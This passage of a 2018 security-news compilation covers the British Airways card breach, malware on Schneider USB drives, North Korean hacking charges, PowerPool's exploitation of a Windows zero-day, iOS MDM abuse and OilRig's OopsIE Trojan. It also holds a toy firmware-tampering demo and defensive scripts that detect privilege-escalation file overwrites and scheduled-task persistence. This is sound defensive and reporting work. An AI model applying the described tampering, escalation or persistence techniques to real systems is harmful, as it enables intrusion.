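    expected = int.from_bytes(hashlib.sha256(_signed_bytes(version, payload)).digest(), "big")
    if pow(int.from_bytes(sig, "big"), e, n) != expected:
        return "rejected: bad signature"
    if version < flash.get("version", 0):
        return "rejected: rollback"
    flash["version"], flash["code"] = version, payload
    return "committed"


def mitm_tamper(image, evil_payload):
    """On-path attacker: swap the payload, fix the CRC, keep the vendor's signature."""
    version, _, _, sig = parse_image(image)
    hdr = HEADER.pack(MAGIC, version, len(evil_payload), zlib.crc32(evil_payload))
    return hdr + evil_payload + sig


if __name__ == "__main__":
    genuine = vendor_sign(2, b"legit BMC firmware v2 (constructed payload)")
    tampered = mitm_tamper(genuine, b"implant: survive OS reinstall, beacon out")
    old, new = {"version": 1}, {"version": 1}
    print("unsigned path, tampered image:", apply_update_unsigned(tampered, old))   # committed
    print("signed path,   tampered image:", apply_update_signed(tampered, new))     # rejected: bad signature
    print("signed path,   genuine image: ", apply_update_signed(genuine, new))      # committed
```

The unsigned path commits the tampered image because the attacker recomputed the CRC; the signed path rejects it because the signature no longer matches the hash of the payload. The order of checks matters: nothing is written to non-volatile storage until both the signature and the version check have passed.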

British Airways hacked, attackers stole details of 380,000 customers
7.9.2018 securityaffairs Incident

Personal and payment card information of 380,000 British Airways customers was stolen by attackers; the stolen data did not include travel or passport details.
British Airways was hacked: the personal and payment card information of 380,000 customers was stolen, while travel and passport details were not affected.

The company published a data breach notification on its website. The breach affected customers making bookings on its website and app from 22:58 BST on August 21 2018 until 21:45 BST on September 5 2018 inclusive.

British Airways has launched an internal investigation and notified the police and relevant authorities.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details.” reads the data breach notification.

“From 22:58 BST August 21 2018 until 21:45 BST September 5 2018 inclusive, the personal and financial details of customers making bookings on our website and app were compromised.”

The airline said the breach has been resolved and its services are working normally. British Airways is contacting affected customers and recommends that anyone who believes they may have been affected contact their bank or credit card provider.

A spokesperson told the TechCrunch website that “around 380,000 card payments” were stolen.

“We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously.” said Alex Cruz, British Airways’ chairman and chief executive.

Privacy advocates and security experts believe the company could face severe fines under the EU's new GDPR data protection rules.

In March 2015, British Airways Executive Club member accounts were hijacked; that incident was not a breach of the airline's systems, as the attackers reused credentials already circulating in the underground.

USB Drives shipped with Schneider Solar Products were infected with malware
7.9.2018 securityaffairs

Schneider Electric announced that some of the USB drives it has shipped with its Conext ComBox and Conext Battery Monitor products were infected with malware.
Schneider Electric found malicious code on the USB drives shipped with its Conext ComBox and Conext Battery Monitor products.

Both products are part of the solar energy offering of the vendor. ComBox is a communications and monitoring device for installers and operators of Conext solar systems. Conext Battery Monitor indicates hours of battery based runtime and determines battery bank state of charge.

The tainted drives have been shipped with all versions of Conext ComBox (sku 865-1058) and all versions of Conext Battery Monitor (sku 865-1080-01).

Schneider revealed that the USB drives were infected with malware during manufacturing at a third-party supplier’s facility.

“Schneider Electric is aware that USB removable media shipped with the Conext Combox and Conext Battery Monitor products may have been exposed to malware during manufacturing at a third-party supplier’s facility.” reads the security advisory published by the company.

Schneider Electric USB Drives

The good news for customers is that the malware found on the USB drives is detected by virtually all anti-virus software; nevertheless, the company recommends that customers do not use the drives and “securely discard” them.

“Schneider Electric has confirmed that the malware should be detected and blocked by all major anti-malware programs. Out of caution, Schneider Electric recommends that these USB removable media are not used.” continues the advisory.

“These USB removable media contain user documentation and non-essential software utilities. They do not contain any operational software and are not required for the installation, commissioning, or operation of the products mentioned above. This issue has no impact on the operation or security of the Conext Combox or Conext Battery Monitor products.”

Users who believe they may have used one of the infected USB drives should scan their systems for the presence of the malicious code.

The extent of the incident is not yet clear; in any case, it is just the latest in a series of supply-chain incidents observed in recent years.

We have reported several cases of pre-installed malware, including one very similar to this, in which IBM Storwize systems shipped last year with infected initialization USB drives.

US charges North Korea agent over Sony Pictures hack and WannaCry
7.9.2018 securityaffairs CyberCrime

The U.S. Department of Justice charged a North Korean agent over the WannaCry attack and the 2014 Sony Pictures Entertainment hack.
The U.S. Department of Justice announced charges against a North Korean government operative alleged to have been involved in the massive WannaCry ransomware attack and the 2014 Sony Pictures Entertainment hack.

“the Justice Department charged on Thursday in a 174-page criminal complaint that detailed how hackers caused hundreds of millions of dollars’ worth of damage to the global economy.” states the NYT.

“Only one North Korean, Park Jin-hyok, was named — charged with computer fraud and wire fraud in the 2014 hack of Sony Pictures Entertainment.”


The individual charged by the US DoJ is Park Jin Hyok, who works for North Korea’s military intelligence agency, the Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT Group.

The complaint against Mr. Park was filed under seal on June 8, just a few days before the summit meeting between Trump and Mr. Kim in Singapore.

The complaint also describes a hacking unit working for North Korea’s intelligence agency that operates out of China and other Asian nations.

The 2014 Sony Pictures Entertainment hack was carried out by Pyongyang in retaliation for the production of the comedy “The Interview”, which mocks North Korean leader Kim Jong Un.

At the time, the US law enforcement suspected the involvement of North Korea’s Unit 121, which is the group of hackers working under the direction of the General Bureau of Reconnaissance.


Hackers wiped many of the company’s computers and exfiltrated over 200GB of sensitive data, including upcoming movie scripts, celebrities’ phone numbers, employee data and copies of then-unreleased films.

WannaCry infected 200,000 computers across 150 countries within hours of the start of the attack. It spread using “EternalBlue”, an exploit originally developed by the NSA for an SMB vulnerability in older versions of Microsoft Windows. The exploit was stolen by a group calling itself the “Shadow Brokers”, which leaked it to the world in April 2017.

The ransomware hit organizations in every industry, including critical infrastructure such as hospitals and banks.

US intelligence highlighted that the North Korean hackers were free to operate from China. Chosun Expo Joint Venture helped fund North Korean hacking groups by covering their activities with legitimate programming work from an office in Dalian, China. According to the complaint, some customers were aware that the employees “were North Korean computer programmers connected to the government.”
Park, who worked there from 2011 to 2013, and his colleagues were overseen by a company manager and a North Korean political attaché, the Justice Department said.

Park worked in China from at least 2011 to 2013 and returned to North Korea shortly before the attack on Sony Pictures in November 2014.

The investigation is still ongoing. Investigations of this kind are difficult because prosecutors cannot simply rely on classified information from the intelligence agencies: the evidence has to be admissible in court.

“In order to get admissible evidence,” said John Carlin, the former head of the Justice Department’s National Security Division, “prosecutors have to work through any issues the intelligence community might have.”

British Airways Hacked With Details of 380,000 Cards Stolen
7.9.2018 securityweek Incident

British Airways said Thursday that the personal and financial details of customers making bookings between August 21 and September 5 were stolen in a data breach involving 380,000 bank cards.

"We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details," the airline said in a statement.

"The personal and financial details of customers making bookings on our website and app were compromised," it said.

"The breach has been resolved and our website is working normally. We have notified the police and relevant authorities.

"We are deeply sorry for the disruption that this criminal activity has caused."

BA said the breach took place between 2158 GMT on August 21 and 2045 GMT on September 5.

Around 380,000 payment cards were compromised.

BA advised anyone who believed they may have been affected to contact their bank or credit card provider and follow their recommendations.

As for compensation, BA said: "We will be contacting customers and will manage any claims on an individual basis."

It said customers due to travel could check in online as normal as the incident had been resolved.

The National Crime Agency said: "We are aware of reports of a data breach affecting British Airways and are working with partners to assess the best course of action."

The NCA is set up to tackle the most serious and organised crime posing the highest risk to public security in Britain.

- Past IT issues -

BA apologised in July after technology issues caused dozens of its flights to and from London Heathrow Airport to be cancelled.

The airline said the problem was down to an incident with an IT system.

And in May 2017, British Airways suffered a major computer system failure triggered by a power supply issue near Heathrow which left 75,000 customers stranded.

IAG, which owns British Airways and Spanish carrier Iberia, said last month that first-half profits more than doubled.

Earnings after taxation flew to 1.4 billion euros ($1.6 billion) in the first six months of 2018 compared with 607 million euros a year earlier, IAG said in a results statement.

The London-listed group, which is also the owner of Irish airline Aer Lingus and Spanish carrier Vueling, added that total revenues swelled three percent to 11.2 billion euros.

BA announced last month that it will halt flights to Tehran in September, citing low profitability as the US reimposes sanctions on Iran.

Fighting Alert Fatigue With Security Orchestration, Automation and Response
7.9.2018 securityweek Security

New research confirms and quantifies two known challenges for security operations teams: they don't have enough staff and would benefit from automated tools.

Demisto's State of SOAR (security orchestration, automation and response) Report, 2018 (PDF) was researched via the ViB community of more than 1.2 million IT practitioners and decision makers. A total of 262 security professionals from 245 companies in a wide range of industry sectors and sizes, mostly in the U.S., took part in the survey. The results show that the two primary and related challenges for SOC and IR staff are not enough time (80.39% of respondents) and too few staff (78.76%) to handle the workload.

“We’ve seen plenty of research that highlights the unending growth in security alerts, a widening cyber security skills gap, and the ensuing fatigue that is heaped upon understaffed security teams," explains Rishi Bhargava, Co-founder of Demisto. "That’s why we conducted this study which allowed us to dig deeper into these issues, their manifestations, as well as possible solutions. Our results produced captivating insights into the state of SOAR in businesses of all sizes.”

"The pattern that stands out starkly from these results," notes the report, "is that the security skills gap continues to be a challenge." The finer detail of these results, however, is less expected: retaining staff is not much easier than finding them (60.1% against 75.2%). Sixty-seven percent of security staff move on to new companies in less than four years, with 26.4% leaving within two years.

This is primarily down to money. Nearly 65% of those who leave their current employment do so because they can earn more elsewhere. Furthermore, asked what is important to infosec employees, 71.26% replied, a 'higher salary'. The often lauded 'company culture' ranked only fifth in importance at 49.43%.

The implication is that smaller companies with smaller budgets hire newcomers, train them and provide the experience that is attractive to larger companies who simply poach experienced security staff with more money. This in turn means that it is the smaller business that is most affected by the overall security skills gap.

It's worth noting, however, that moving on to greener pastures is not the only cause of failing to retain existing staff. As many as 27.2% of security employees leave because of over work and fatigue. This echoes a comment from Jerome Segura at Malwarebytes: "There's a lot of burnout in infosec. It's tough, but that's the reality. If you're in infosec, you're on call 24/7."

According to the report's respondents, their primary concerns -- or pain points -- are that they currently receive too many alerts (cited by 46.4% of respondents; an issue that will be aggravated by staff shortages) and too many false positives among those alerts (cited by 69% of respondents; an issue that is technology based).

Affecting both of these (but not specifically cited as a pain point) is the number of different tools used by the security team. More than three-quarters of the respondents have to learn how to use more than four different security tools for effective security operations and incident response. "With the number of tools constantly on the rise, high training times and attrition rates truly spell out the gravity of the human capital challenge facing the industry today."

Bhargava explains further. “Security deployment has become fractured with innumerous specialized tools, making it increasingly difficult for security teams to manage alerts across disparate systems and locations, particularly considering the talent shortage present in security today,” said Bhargava. “There is a great opportunity for SOAR tools to help unify these products and processes, using automated response to reduce alert fatigue and direct analyst resources to the alerts which are most likely to cause harm.”

It is Demisto's premise -- it is itself a SOAR vendor -- that SOAR technology can help alleviate these difficulties. "An important goal of our study was to find and validate linkages between high incident loads, high response teams, and the desire for automation." First the report quantifies the individual workload. More than 12,000 alerts are reviewed each week; and each alert takes more than 4 days to resolve.

There are simply too many alerts for the security team to handle manually. It is, says the report, "clear that there’s a vicious cycle in effect. Alert volume leads to increased MTTR [mean time to respond] which in turn leads to even more alert volume." Automation as a solution is already in use, with more than half of the respondents automating or seeing the benefit in automating much of the incident response workload.

"Proactively," says the report, "security operations and threat hunting ranked high on the ‘automation candidates’ list, highlighting security teams’ desire for automation to assist them in identifying incipient threats and vulnerabilities. Reactively, incident response, tracking IR metrics, and case management were felt as good candidates for partial or full automation."

For now, SOAR is still an emergent technology. "A sign of SOAR’s emergent nature is highlighted by around 20% of our responders being unsure about where to include SOAR in their budgets," admits the report. "A growing acknowledgement of SOAR in security budgets will come with increased awareness and continued verifiable benefits in existing SOAR deployments."

Demisto believes, however, that SOAR has the potential to improve proactive threat hunting, standardize incident processes, improve investigations, accelerate and scale incident response, simplify security operations and maintenance, and generally fight the alert fatigue that comes with too few staff responding to too many alerts.

Cupertino, Calif.-based Demisto raised $20 million in a Series B funding round in February 2017, bringing the total raised to $26 million. In May 2018, Gartner included Demisto in its report on 'Cool Vendors in Security Operations and Vulnerability Management'.

U.S. Charges North Korean Over Lazarus Group Hacks
7.9.2018 securityweek CyberCrime

The U.S. Department of Justice on Thursday announced charges against a North Korean national who is believed to be a member of the notorious Lazarus Group, to which governments and the cybersecurity industry have attributed several high profile attacks.

The suspect is Park Jin Hyok, who according to the DOJ worked for a North Korean government front company known as Chosun Expo Joint Venture and Korea Expo Joint Venture (KEJV). The Democratic People’s Republic of Korea allegedly used this company, which also has offices in China, to support its cyber activities.

The complaint, filed on June 8 in a U.S. District Court in Los Angeles and made public on Thursday, accuses Park and other members of the Lazarus Group of conducting destructive cyberattacks that resulted in “damage to massive amounts of computer hardware and extensive loss of data, money and other resources.”

The complaint describes both successful and unsuccessful campaigns of the threat actor, but it focuses on four operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of several U.S. defense contractors, including Lockheed Martin, over the course of 2016 and 2017.

Five Eyes countries and Japan last year officially blamed North Korea for the WannaCry attack.

According to the DOJ, Park worked as a computer programmer at KEJV, which has been linked to DPRK military intelligence. Park allegedly did programming work for the company’s paying clients, while also engaging in malicious activities on behalf of Pyongyang.

The man has been charged with one count of conspiracy to commit computer fraud and abuse, for which he faces up to five years in prison, and one count of conspiracy to commit wire fraud, which carries a sentence of up to 20 years in prison.

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today,” said Dmitri Alperovitch, CTO and co-founder of CrowdStrike. “Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.”

“One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice,” Alperovitch added.

FDD Senior Fellow David Maxwell, who specializes in North Korea’s nuclear and cyber threats, noted that the charges represent a critically important development.

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm,” Maxwell said via email.

“The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea,” he added.

This is not the first time the United States has charged foreign nationals over cyberattacks believed to have been sponsored – or at least condoned – by their respective governments. The DOJ in the past years unsealed indictments against Chinese, Russian, Syrian and Iranian nationals.

Recently uncovered PowerPool group used the recent Windows zero-day exploit
7.9.2018 securityaffairs

Security experts from ESET observed a threat actor, tracked as PowerPool, exploiting the recently disclosed Windows zero-day flaw in targeted attacks.
The vulnerability was publicly disclosed on August 27 by the security researcher known as “SandboxEscaper”, who also published proof-of-concept exploit code.

The flaw affects Microsoft Windows and can be exploited by a local attacker or a malicious program to obtain SYSTEM privileges on the vulnerable machine. It is a local privilege escalation, so the attacker needs code execution on the machine first.

The vulnerability resides in the Windows Task Scheduler, in its handling of Advanced Local Procedure Call (ALPC) requests.

Microsoft was expected to address the vulnerability on its September Patch Tuesday, scheduled for September 11, but the news of live attacks exploiting the issue could push the company to roll out a fix sooner.

The 0patch community has also released an unofficial micropatch for the vulnerability.

Now security researchers from ESET reported the local privilege escalation vulnerability has been exploited by a previously unknown group tracked as PowerPool.

“As one could have predicted, it took only two days before we first identified the use of this exploit in a malicious campaign from a group we have dubbed PowerPool.“reads the analysis published by ESET.

“This group has a small number of victims and according to both our telemetry and uploads to VirusTotal (we only considered manual uploads from the web interface), the targeted countries include Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States and Ukraine.”

The threat actor leveraged the Windows zero-day exploit in targeted attacks against a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines, and Poland.

According to ESET, attackers have modified the publicly available exploit source code and recompiled it.

To obtain a local privilege escalation, the attacker has to choose the target file carefully: the file that gets overwritten must be one that is automatically executed with administrative rights.

“PowerPool’s developers chose to change the content of the file C:\Program Files (x86)\Google\Update\GoogleUpdate.exe. This is the legitimate updater for Google applications and is regularly run under administrative privileges by a Microsoft Windows task.” continues the analysis.
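As an added example of how a defender might look for this pattern (constructed here, not from ESET's report), the following Python rules run over Sysmon-style records and flag (a) a write to an auto-elevated binary such as GoogleUpdate.exe by a process that is not its legitimate updater and (b) that binary later launching with a hash that differs from a known-good baseline. The event fields, the allowed writers and the baseline hashes are assumptions; only the GoogleUpdate.exe path comes from the ESET analysis.

```python
import hashlib
import ntpath


def norm(path):
    """Case-fold and normalise a Windows path so rules match regardless of casing."""
    return ntpath.normpath(path).lower()


# Binaries a scheduled task or service runs with elevated rights. GoogleUpdate.exe is
# the file PowerPool overwrote according to ESET; the allowed writers and the baseline
# hash are constructed for this example (assumption), not taken from the report.
GOOGLE_UPDATE = r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"
WATCHED = {
    norm(GOOGLE_UPDATE): {
        "allowed_writers": {norm(GOOGLE_UPDATE), norm(r"C:\Windows\System32\msiexec.exe")},
        "baseline_sha256": hashlib.sha256(b"constructed: genuine GoogleUpdate.exe").hexdigest(),
    },
}


def scan_events(events, watched=WATCHED):
    """Return (index, rule, severity) findings over Sysmon-style records:
    id 11 = FileCreate (image wrote target), id 1 = ProcessCreate (image started)."""
    findings = []
    for i, ev in enumerate(events):
        image = norm(ev.get("image", ""))
        if ev["id"] == 11:                                   # something wrote a file
            rule = watched.get(norm(ev.get("target", "")))
            if rule and image not in rule["allowed_writers"]:
                # A non-SYSTEM writer touching an auto-elevated binary is the LPE shape.
                sev = "medium" if ev.get("user", "").upper().endswith("\\SYSTEM") else "high"
                findings.append((i, "unexpected_writer", sev))
        elif ev["id"] == 1:                                  # a process started
            rule = watched.get(image)
            if rule and ev.get("sha256", "").lower() != rule["baseline_sha256"]:
                findings.append((i, "hash_drift_on_elevated_binary", "high"))
    return findings


# Constructed sample telemetry: a legitimate self-update, then the LPE pattern
# (a low-privilege process rewrites the updater, which later runs as SYSTEM).
EVIL_HASH = hashlib.sha256(b"constructed: recompiled PowerPool stage").hexdigest()
SAMPLE_EVENTS = [
    {"id": 11, "image": GOOGLE_UPDATE, "target": GOOGLE_UPDATE,
     "user": r"NT AUTHORITY\SYSTEM"},
    {"id": 11, "image": r"C:\Users\alice\AppData\Local\Temp\dropper.exe",
     "target": GOOGLE_UPDATE, "user": r"CORP\alice"},
    {"id": 1, "image": GOOGLE_UPDATE, "user": r"NT AUTHORITY\SYSTEM",
     "sha256": EVIL_HASH, "parent": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for idx, rule, sev in scan_events(SAMPLE_EVENTS):
        print(f"[{sev}] event {idx}: {rule} -> {SAMPLE_EVENTS[idx]['image']}")
```

The first rule only fires if the telemetry actually records the write; the second catches the result however the file was modified, which is why a hash baseline of every binary that a scheduled task or service runs with elevated rights is the more robust control.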

PowerPool’s initial attack vector is spear-phishing. ESET researchers pointed out that the same group was behind a spam campaign spotted by SANS in May that used SYLK (“Symbolic Link”, .slk) spreadsheet files to spread malicious code; despite the name, these are an Excel-compatible file format, not filesystem symbolic links.

PowerPool group

The group uses multi-stage malware. The first stage is a backdoor used for reconnaissance: it determines whether the infected machine is of interest to the attackers and, if so, downloads a second-stage backdoor that supports commands such as uploading and downloading files, killing processes and listing folders.

The analysis of the second-stage backdoor allowed the researchers to determine that the malicious code is not “a state-of-the-art APT backdoor.”

“Once the PowerPool operators have persistent access to a machine with the second-stage backdoor, they use several open-source tools, mostly written in PowerShell, to move laterally on the network.” continues the report.

The tools used by the attackers include PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

“This specific campaign targets a limited number of users, but don’t be fooled by that: it shows that cybercriminals also follow the news and work on employing exploits as soon as they are publicly available,” ESET concluded.

Further details, including the IoCs are reported in the analysis published by ESET.

Attackers Abuse Age Restrictions to Hide Apps on iOS Devices
6.9.2018 securityweek Apple

Malicious actors leveraging an open source mobile device management (MDM) system have been abusing a legitimate iOS feature to hide legitimate applications and trick victims into using malicious counterparts.

The attacks, first exposed by Talos’ security researchers in July, involved the use of malicious versions of five programs (AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp) that were then deployed onto iOS devices to steal messages.

Given how the enrollment process for the MDM works, the security researchers assumed right from the start that the rogue applications were being installed either via direct access to the compromised devices or through sophisticated social engineering. Each step of the enrollment process required user interaction, Talos discovered.

The security researchers now reveal that the attackers abused the MDM solution to control the victims’ devices and deploy a new profile onto them. Next, the actors leveraged the age rating restriction functionality in iOS to hide the legitimate apps.

The age ratings for WhatsApp and Telegram are 12-plus and 17-plus, respectively, and the actors set the age rating limit to 9-plus. Thus, the legitimate apps would no longer be shown on the device and the victim was only able to access the rogue variants instead.

“The app still exists on the device, however, the user will not be able to interact with it, even if the user searches for the app using the search function on the iOS device. It simply does not open. All mobile device users should be aware of these attack methods as to prevent attackers from gaining control of their phones through an MDM,” Talos explains.

iOS supports the configuring of devices using profiles, and the MDM enrollment mechanism too is performed using a profile. Such profiles are easy to create and Apple even offers an official tool for that. These apps allow for the restriction of app usage, but the app restriction is usually limited to the supervised device.

The iPhones impacted by these attacks, however, were not in supervised mode. Instead, the attackers abused the age rating setting to forbid the usage of apps rated above 9-plus. Thus, the apps remained on the device but could no longer be accessed.

“Once this profile is installed on the iOS device, the applications restricted by the age rating stay installed, but can no longer be used or accessed, and the icon disappears from the device springboard,” Talos explains.

The profile can be installed manually via Apple Configurator, or by opening the profile XML from Safari. Once that happens, a new entry appears in the Settings > General > Profile menu. However, if the MDM deploys the profile, it does not appear there (only the MDM enrollment profile will be listed).

“It's important to note here that there is no malicious malware, vulnerability or zero-day used to enroll the phone within the MDM. It is a legitimate method of device administration that is used within enterprises throughout the world. The attacker has merely leveraged this process,” the researchers note.

Users can head to Settings > General > Profiles & Device Management > [MDM configuration] on their iOS devices to view information about the restrictions and applications set/installed by MDM profiles. If no Profiles & Device Management menu is available, the device is not enrolled.

Mozilla Appoints New Policy, Security Chief
6.9.2018 securityweek Security

Mozilla on Tuesday announced that Alan Davidson has been named the organization’s new Vice President of Global Policy, Trust and Security.

According to Mozilla Chief Operating Officer Denelle Dixon, Davidson will work with her on scaling and reinforcing the organization’s “policy, trust and security capabilities and impact.”

His responsibilities will also include leading Mozilla’s public policy work on promoting an open and “healthy” Internet, and supervising a security and trust team whose focus is on promoting “innovative privacy and security features.”

“For over 15 years, Mozilla has been a driving force for a free and open Internet, building open source products with industry-leading privacy and security features. I am thrilled to be joining an organization so committed to putting the user first, and to making technology a force for good in people’s lives,” said Davidson.

Prior to joining Mozilla, Davidson worked for the U.S. Department of Commerce, the New America think tank, and Google. At Google, he helped launch the tech giant’s Washington D.C. office and led the company’s public policy and government relations efforts in the Americas.

“Alan is not new to Mozilla,” Dixon said. “He was a Mozilla Fellow for a year in 2017-2018. During his tenure with us, Alan worked on advancing policies and practices to support the nascent field of public interest technologists — the next generation of leaders with expertise in technology and public policy who we need to guide our society through coming challenges such as encryption, autonomous vehicles, blockchain, cybersecurity, and more.”

Mozilla last week laid out plans to add various anti-tracking features to Firefox in an effort to protect users and help them choose what information they share with the websites they visit.

The new features include a mechanism designed to block trackers that slow down page loads, stripping cookies and blocking storage access from third-party tracking content, and blocking trackers that fingerprint users and sites that silently mine cryptocurrencies. Some of these new features are already present in Firefox Nightly and are expected to become available in the stable release of the web browser in the near future.

Iranian Hackers Improve Recently Used Cyber Weapon
6.9.2018 securityweek BigBrothers

The Iran-linked cyberespionage group OilRig was recently observed using a variant of the OopsIE Trojan that was updated with new evasion capabilities, Palo Alto Networks reports.

The group has been persistently targeting government entities in the Middle East with previously identified tools and tactics, including the OopsIE Trojan that was first identified in February 2018. Unlike previously observed samples, the new iteration packs anti-analysis and anti-virtual machine capabilities, which allow it to further evade detection.

The attacks involving this Trojan variant were detected in July, as part of a campaign that also delivered the QUADAGENT backdoor. However, each malicious program was targeting a different organization.

As part of that wave of attacks, the hackers were using compromised email accounts at a government organization in the Middle East to send spear phishing emails delivering the OopsIE Trojan. The attacks targeted a government agency within the same nation state, Palo Alto Networks’ researchers found.

The email was sent to the email address of a user group that had published documents regarding business continuity management on the Internet. The attackers used lures specifically crafted for this assault.

The OopsIE Trojan begins execution by performing multiple anti-virtualization and sandbox checks. The malware would check CPU fan information, temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

While some of these techniques have been observed in other malware before, OopsIE appears to be the first to check the CPU fan. The CPU temperature check was previously seen being used by GravityRAT.

The time zone check is also of interest, as the Trojan would only execute if it finds strings for Iran, Arab, Arabia and Middle East. These point to five time zones that encompass 10 countries, showing that the malware is highly targeted.

The updated Trojan variant packs most of the functionality previously associated with the threat, but also includes obfuscation, in addition to requiring the user to interact with an error dialog box (the last in the previously mentioned series of checks).

Next, the malware sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript that ensures persistence. The process attempts to run the Trojan every three minutes.
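The persistence step described above leaves a footprint that can be hunted for. As an added example (not Palo Alto Networks' code), the script below scans rows shaped like the verbose CSV output of `schtasks /query /fo CSV /v` and flags tasks that combine a script host, a path under a user's AppData folder, and a very short repeat interval. The sample rows are constructed and use only a subset of the real columns, and the rendering of the "Repeat: Every" field is an assumption, so two common spellings are accepted.

```python
"""Flag scheduled tasks that look like script-based persistence.

Added example, not Palo Alto Networks' code.  It scans rows in the shape of
`schtasks /query /fo CSV /v` output and flags tasks that run a script engine
on a file under AppData at a short repeat interval, the pattern described for
OopsIE (a VBScript in App Data, run every three minutes).
"""
import csv
import io
import re
from typing import Dict, List, Optional

SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell")
MAX_REPEAT_MINUTES = 5  # repeating this often is unusual for a user's own tasks

# Constructed sample rows: a subset of the verbose schtasks CSV columns.  The
# exact rendering of "Repeat: Every" is an assumption; both "H:MM:SS" and
# "N Hour(s), M Minute(s)" are accepted by repeat_minutes().
SAMPLE_CSV = r'''"TaskName","Task To Run","Start In","Run As User","Schedule Type","Repeat: Every"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k -g","N/A","SYSTEM","Weekly","N/A"
"\Adobe Acrobat Update Task","C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe","N/A","alice","Daily","0 Hour(s), 60 Minute(s)"
"\WindowsUpdateCheck","wscript.exe C:\Users\alice\AppData\Roaming\update.vbs","C:\Users\alice\AppData\Roaming","alice","Daily","0 Hour(s), 3 Minute(s)"
'''


def repeat_minutes(value: str) -> Optional[int]:
    """Parse a repeat interval into minutes; None when the task does not repeat."""
    m = re.fullmatch(r"(\d+):(\d{2}):(\d{2})", value.strip())
    if m:
        hours, minutes, _seconds = (int(g) for g in m.groups())
        return hours * 60 + minutes
    m = re.search(r"(\d+)\s*Hour\(s\),\s*(\d+)\s*Minute\(s\)", value)
    if m:
        return int(m.group(1)) * 60 + int(m.group(2))
    return None


def task_indicators(row: Dict[str, str]) -> List[str]:
    """Return the persistence indicators present on one task row."""
    reasons = []
    cmd = row.get("Task To Run", "").lower()
    start_in = row.get("Start In", "").lower()
    if any(host in cmd for host in SCRIPT_HOSTS):
        reasons.append("script host")
    if "\\appdata\\" in cmd or "\\appdata\\" in start_in:
        reasons.append("AppData path")
    interval = repeat_minutes(row.get("Repeat: Every", ""))
    if interval is not None and interval <= MAX_REPEAT_MINUTES:
        reasons.append(f"repeats every {interval} min")
    return reasons


def scan(csv_text: str) -> List[Dict[str, object]]:
    """Flag tasks showing at least two of the three indicators."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = task_indicators(row)
        if len(reasons) >= 2:
            findings.append({"task": row["TaskName"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_CSV):
        print(f"{f['task']}: {', '.join(f['reasons'])}")
```

Requiring two of the three indicators keeps ordinary vendor updaters (which repeat hourly from Program Files) out of the results while still catching the short-interval AppData script. Feeding the scanner real output means redirecting the schtasks command to a file and reading that file instead of the embedded sample.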

The malware then starts communication with the command and control (C&C) server (it uses the www.windowspatch[.]com domain as C&C).

The malware supports various commands received from the server: it can run a command, write the output to a file and send it to the server; download a file to the system; read a specified file and upload its contents; and uninstall itself.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.

Windows Zero-Day Exploited in Targeted Attacks by 'PowerPool' Group
6.9.2018 securityweek

A threat group tracked by security firm ESET as “PowerPool” has been exploiting a Windows zero-day vulnerability to elevate the privileges of a backdoor in targeted attacks.

The flaw was disclosed on August 27 by a researcher who uses the online moniker “SandboxEscaper.” The security hole was not reported to Microsoft before its details were made public – including a compiled exploit and its source code – as SandboxEscaper was apparently frustrated with the company’s vulnerability reporting process.

Other members of the industry quickly confirmed the vulnerability, which seems to affect the Advanced Local Procedure Call (ALPC) interface of the Windows Task Scheduler. Malicious actors with local access to the targeted device can exploit the flaw to escalate privileges to SYSTEM by overwriting files that should normally be protected by filesystem access control lists (ACLs).

The public exploit has been confirmed to work on 64-bit versions of Windows 10 and Windows Server 2016, with the possibility to adapt it for 32-bit systems as well.

Microsoft has launched an investigation, but it has yet to release a patch or provide mitigations. While the tech giant initially suggested that a fix may be released with its regular Patch Tuesday updates, the company may roll out a patch sooner now that the vulnerability has been exploited in malicious attacks.

In the meantime, 0patch has released an unofficial fix for the vulnerability and CERT/CC’s advisory for the bug describes some mitigations.

According to ESET, the local privilege escalation vulnerability has been exploited by a newly uncovered group it tracks as PowerPool. Based on the security firm’s telemetry and malware samples uploaded to VirusTotal, the threat actor appears to have leveraged the Windows zero-day against a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines and Poland.

ESET researchers determined that PowerPool slightly modified the publicly available exploit source code and recompiled it for its attacks.

